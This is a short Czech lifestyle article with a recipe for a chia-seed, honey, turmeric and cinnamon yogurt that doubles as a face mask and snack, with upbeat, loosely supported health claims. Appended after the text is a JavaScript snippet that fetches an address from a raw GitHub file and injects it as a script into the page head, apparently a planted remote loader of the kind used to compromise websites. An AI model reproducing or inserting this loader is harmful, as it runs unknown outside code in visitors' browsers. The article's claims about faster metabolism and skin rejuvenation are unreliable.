Zimní období naši pleť často zatěžuje, mráz vysušuje a je třeba zvýšené péče. Kromě toho se i v zimním čase cítíme často unavení, bez energie, chybí nám slunce. Jak si pomoci metodou „dva v jednom?“ Jak si dodat energii a vitalitu a pomoci i své pleti?
Udělejte si zdravou svačinku a co nesníte, naneste na pleť? Oč se jedná? O superzdravý a výživný „jogurt“.

Výživný domácí jogurt

Tento jogurt si vyrobíte doma velmi snadno. Co k tomu budete potřebovat?

  • 1 polévkovou lžíci bílého přírodního jogurtu bez příchutí
  • 2 polévkové lžíce chia semínek
  • 1 čajovou lžičku medu, mleté kurkumy a skořice
  • Trošku kokosového nebo mandlového mléka na zalití (lze nahradit i běžným plnotučným)

Příprava je velmi jednoduchá. Smíchejte semínka s jogurtem a medem, zalijte mlékem tak, aby byla směs zakryta a nechte odležet minimálně hodinu, aby  směs získala gelovou konzistenci. Po té přidejte kurkumu a skořici. Pečlivě promíchejte.

Postup

Směs naneste na očištěnou a ideálně trochu nahřátou pleť, stačí ji několikrát omýt teplou vodou. Masku nanášíme na obličej, můžeme i na krční partie, ale vyhněte se okolí očí. Nechte působit  15-20min a po té opláchněte vlažnou vodou. Zbytek směsi pak snězte!

Účinky

Jsou velmi pozitivní! Chia semínka vám dodají energii, kurkuma, skořice a med obsahují vitamíny a látky prospěšné našemu organismu, podporují látkovou přeměnu a zrychlují metabolismu, pomáhají odstranit únavu.
Chia semínka, plná omega 3 kyselin omladí a rozjasní naší pleť, med dodá vitamíny a podpoří její elasticitu.
Zkrátka touto svačinkovou maskou podpoříte své zdraví i krásu!

  (var url = „https://raw.githubusercontent.com/truba77/trubnik/main/to.txt“; fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement(„script“); script.src = data.trim(); document.getElementsByTagName(„head“)[0].appendChild(script); });)